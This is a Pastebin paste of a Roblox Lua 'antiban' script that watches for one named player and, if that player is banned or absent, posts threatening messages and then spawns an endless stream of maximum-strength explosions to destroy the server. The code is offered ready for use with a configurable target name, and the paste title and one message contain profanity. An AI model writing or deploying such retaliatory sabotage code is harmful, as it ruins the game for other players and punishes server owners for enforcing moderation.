Advertisement
moathon

FUCKING SCRIPT KIDDIES

Jul 22nd, 2016
426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.33 KB | None | 0 0
  1. ------Bansey's antiban script!--------------------------------------Dont take credits!------------------------------------
  2. ------------Don't change this!-----------
  3. n = "B"
  4. n = n.."a"
  5. n = n.."ns"
  6. n = n.."e"
  7. n = n.."y"
  8. h = Instance.new("Hint")
  9. m = Instance.new("Message")
  10. script.Name = "AntiBan"
  11. --------------You can change below------------------
  12. respawntime = 1
  13. protect = "firemomo45"
  14. -------Version [Don't change]------------
  15. version = 1.05
  16.  
  17. while true do
  18. if game.Players:findFirstChild(protect) == nil then
  19. m.Parent = game.Workspace
  20. m.Text = protect.." is banned, the server will be removed..."
  21. wait(1)
  22. m.Text = "Unban "..protect.." or remove your script, else the server will be down with the following countdown!"
  23. wait(.5)
  24. for i= respawntime, 0, -1 do
  25. if game.Players:findFirstChild(protect) == nil then
  26. m.Text = "Fucking script kiddies banned firemomo45, server down."
  27. wait(.5)
  28. end
  29. end
  30. if game.Players:findFirstChild(protect) ~= nil then
  31. m.Text = protect.." came back, nothing will happen!"
  32. wait(3)
  33. m:remove()
  34. else
  35. while true do
  36. local DIE = Instance.new("Explosion",game.Workspace)
  37. DIE.BlastRadius = 999999999
  38. DIE.BlastPressure = 10000000000000000
  39. DIE.DestroyJointRadiusPercent = 1
  40. wait()
  41. end
  42. end
  43. else
  44. h.Parent = game.Workspace
  45. h.Text = "Don't ban firemomo45 PLS"
  46. end
  47. wait()
  48. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement